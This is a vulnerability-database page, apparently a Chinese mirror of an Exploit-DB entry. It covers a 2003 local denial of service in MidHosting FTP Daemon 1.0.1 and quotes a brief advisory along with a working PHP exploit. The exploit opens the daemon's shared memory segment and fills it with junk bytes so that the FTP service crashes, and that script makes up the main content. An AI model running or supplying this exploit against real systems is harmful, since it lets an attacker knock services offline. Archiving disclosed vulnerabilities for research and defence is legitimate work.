MidHosting FTP Daemon 1.0.1 – Shared Memory Local Denial of Service

MidHosting FTP Daemon 1.0.1 – Shared Memory Local Denial of Service

漏洞ID 1053973 漏洞类型
发布时间 2003-06-18 更新时间 2003-06-18
图片[1]-MidHosting FTP Daemon 1.0.1 – Shared Memory Local Denial of Service-安全小百科CVE编号 N/A
图片[2]-MidHosting FTP Daemon 1.0.1 – Shared Memory Local Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22796
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7956/info

It has been reported that MidHosting FTP Daemon does not properly implement shared memory when the m flag (-m) is enabled. Because of this, an attacker could corrupt process memory, causing the service to crash. 

<?php
# mhftpd denial of service

define('SHMSIZE', 16384);

if (($shmid = shmop_open(ftok('/tmp', 'U'), 'w', 0777, SHMSIZE)) == -1) {
die();
}
shmop_write($shmid, str_repeat('A', SHMSIZE), 0);

?>

相关推荐: TopLayer AppSwitch 2500 Multiple DoS Vulnerabilities

TopLayer AppSwitch 2500 Multiple DoS Vulnerabilities 漏洞ID 1104186 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 2000-05-20 更新…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享